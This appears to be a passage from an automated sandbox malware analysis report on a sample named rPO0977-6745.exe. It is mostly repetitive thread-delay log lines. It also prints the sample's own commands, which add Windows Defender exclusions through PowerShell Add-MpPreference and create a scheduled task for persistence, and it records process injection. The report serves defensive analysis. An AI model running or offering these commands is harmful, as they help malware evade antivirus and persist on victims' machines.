Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 7296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8096	Thread sleep count: 3230 > 30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8096	Thread sleep count: 6619 > 30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599220s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598766s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597984s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597875s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597216s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596660s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596516s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596357s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596241s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596140s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -596029s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595921s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595812s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595703s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595594s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595484s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -595046s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -594714s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -594607s >= -30000s
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092	Thread sleep time: -594500s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598983	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598758	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598542	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598436	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598091	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597983	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597653	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599220
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597216
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596660
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596357
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596241
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596029
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595812
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595594
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595484
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594714
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594607
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594500

Source: EDyxAgkldisLe.exe, 00000017.00000002.3689470332.00000000009F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcac7a674eafb1<
Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcac9db89d7b60<
Source: rPO0977-6745.exe, 0000000A.00000002.3690480544.0000000001206000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory written: C:\Users\user\Desktop\rPO0977-6745.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory written: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Users\user\Desktop\rPO0977-6745.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
